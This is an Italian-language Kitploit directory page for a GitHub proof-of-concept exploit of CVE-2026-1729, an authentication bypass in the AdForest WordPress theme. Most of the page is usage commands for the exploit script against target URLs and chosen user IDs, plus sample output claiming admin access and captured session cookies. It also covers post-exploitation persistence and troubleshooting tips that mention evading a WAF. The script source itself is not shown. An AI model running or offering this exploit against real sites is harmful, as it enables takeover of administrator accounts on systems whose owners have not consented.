Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — Il tema AdForest per WordPress è vulnerabile al bypass dell'autenticazione in tutte le versioni, inclusa la 6.0.12. Ciò è dovuto al fatto che il plugin non verifica correttamente l'identità di un utente prima di autenticarlo tramite la funzione 'sb_login_user_with_otp_fun'. Questo rende possibile per attaccanti non autenticati accedere al sistema, inclusi gli account admin. | Kitploit
Strumenti/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
6 mesi faNon ancora revisionato

Informazioni

Il tema AdForest per WordPress è vulnerabile al bypass dell'autenticazione in tutte le versioni, inclusa la 6.0.12. Ciò è dovuto al fatto che il plugin non verifica correttamente l'identità di un utente prima di autenticarlo tramite la funzione 'sb_login_user_with_otp_fun'. Questo rende possibile per attaccanti non autenticati accedere al sistema, inclusi gli account admin.

Condividi

CVE-2026-1729 - PoC di bypass dell'autenticazione WordPress AdForest

Descrizione

Semplice Proof of Concept per CVE-2026-1729 (PoC) - Vulnerabilità di bypass dell'autenticazione nel tema WordPress AdForest. Autore: f3ds cr3w est 2oo2 blog

Caratteristiche

  • ✅ Accesso admin diretto senza credenziali
  • ✅ Funziona su istanze WordPress in produzione
  • ✅ Nessuna configurazione Docker richiesta
  • ✅ Interfaccia a riga di comando semplice
  • ✅ Persistenza della sessione

Requisiti

  • Python 3.6+
  • Libreria requests

Installazione

root@kitploit:~
pip install requests

Utilizzo

Utilizzo di base

root@kitploit:~
python poc/exploit.py https://target-site.com

Specifica un ID utente target

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

Esempi

root@kitploit:~
# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com

# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5

# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

Output

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

Cosa succede dopo l'exploit

  1. Accesso admin: Ottieni accesso admin completo a /wp-admin/
  2. Persistenza della sessione: L'exploit mantiene i cookie di sessione
  3. Informazioni sull'utente: Mostra quale account è stato compromesso
  4. Accesso diretto: Puoi accedere immediatamente alla dashboard admin di WordPress

Note

  • Uso legale: Usalo solo su siti di tua proprietà o per i quali hai esplicito permesso di test
  • Requisiti del target: Il sito deve avere il tema AdForest installato
  • Tasso di successo: Funziona sulle versioni vulnerabili del tema AdForest
  • Nessuna installazione: Non è necessario installare nulla sul server target

Risoluzione dei problemi

Se l'exploit fallisce:

  1. Verifica che il tema AdForest sia installato
  2. Controlla che il sito utilizzi WordPress
  3. Assicurati che la versione del tema sia vulnerabile
  4. Nessun WAF o plugin di sicurezza che blocchi la richiesta
Scarica lo strumento